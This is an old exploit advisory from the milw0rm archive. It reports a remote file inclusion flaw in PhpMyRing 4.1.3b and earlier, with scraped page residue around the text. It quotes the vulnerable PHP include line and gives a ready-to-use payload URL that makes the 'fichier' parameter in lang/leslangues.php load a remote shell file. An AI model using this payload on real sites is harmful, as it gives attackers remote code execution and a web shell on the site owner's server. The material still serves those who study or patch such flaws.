39 lines
No EOL
662 B
Text
39 lines
No EOL
662 B
Text
*******************************************************************************
|
|
# Title : PhpMyRing <= 4.1.3b (path) Remote File Include Vulnerability
|
|
# Author : ajann
|
|
# Contact : :(
|
|
# S.Page : http://www.microniko.net/phpmyring/
|
|
# $$ : Free
|
|
|
|
*******************************************************************************
|
|
[[ERROR]]]
|
|
..
|
|
...
|
|
.....
|
|
<?
|
|
include ($fichier.".php");
|
|
?>
|
|
..
|
|
...
|
|
.....
|
|
|
|
[[ERROR]]]
|
|
|
|
|
|
[[RFI]]]
|
|
|
|
http://[target]/[path]//lang/leslangues.php?fichier=[SHELL]
|
|
|
|
Example:
|
|
|
|
//lang/leslangues.php?fichier=http://[target]/[path]/shell.x
|
|
|
|
[[/RFI]]
|
|
|
|
"""""""""""""""""""""
|
|
# ajann,Turkey
|
|
# ...
|
|
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2007-01-31] |